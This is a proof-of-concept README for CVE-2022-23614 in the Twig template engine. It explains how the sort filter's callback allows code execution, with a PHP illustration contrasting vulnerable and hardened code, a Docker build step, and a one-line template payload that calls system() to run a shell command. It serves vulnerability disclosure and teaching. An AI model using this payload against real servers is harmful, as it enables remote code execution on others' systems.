
PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)


davwwwx/CVE-2022-23614


CVE-2022-23614

PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)

As seen in this commit - https://github.com/twigphp/Twig/commit/.., Twig was passing a user-supplied function name as the callback parameter to uasort (here), which leads to arbitrary code execution.
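The pattern described above, next to a hardened variant, as an added example (not code from this repository or from Twig). The function names `sort_filter_unchecked`, `sort_filter_checked` and `audit_marker` are hypothetical, and the closure-only check is one way to restrict the callback, assuming that templates should only be able to pass arrow functions.

```php
<?php
// Added illustration, not Twig's source; all function names are hypothetical.

// Pre-fix pattern: whatever the template passes as the sort argument is
// handed to uasort() as the comparator. PHP accepts a string naming any
// function as a callable, so the template author chooses what gets called.
function sort_filter_unchecked(array $items, $arrow = null): array
{
    if ($arrow !== null) {
        uasort($items, $arrow);
    } else {
        asort($items);
    }
    return $items;
}

// Hardened pattern: for sandboxed (untrusted) templates accept only Closure
// objects, which is what a Twig arrow function compiles to.
function sort_filter_checked(array $items, $arrow = null, bool $sandboxed = true): array
{
    if ($arrow !== null && $sandboxed && !$arrow instanceof \Closure) {
        throw new \InvalidArgumentException('sort callback must be a Closure in sandbox mode');
    }
    return sort_filter_unchecked($items, $arrow);
}

// Constructed stand-in for a function the template author should not reach.
function audit_marker(string $a, string $b): int
{
    $GLOBALS['reached'][] = [$a, $b];
    return 0;
}

$GLOBALS['reached'] = [];
sort_filter_unchecked(['x', 'y'], 'audit_marker');
echo 'unchecked: callback invoked ', count($GLOBALS['reached']), " time(s)\n";

try {
    sort_filter_checked(['x', 'y'], 'audit_marker');
} catch (\InvalidArgumentException $e) {
    echo 'checked: rejected, ', $e->getMessage(), "\n";
}

$sorted = sort_filter_checked([3, 1, 2], fn ($a, $b) => $a <=> $b);
echo 'checked with closure: ', implode(',', $sorted), "\n";
```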

To build and run the Docker container with a vulnerable Twig version:

$ ./build-docker.sh

Open the webpage at localhost:1337 and try rendering the following payload:

{{ ['id','']|sort('system') }}

[Image: PoC]

[Image: Result]
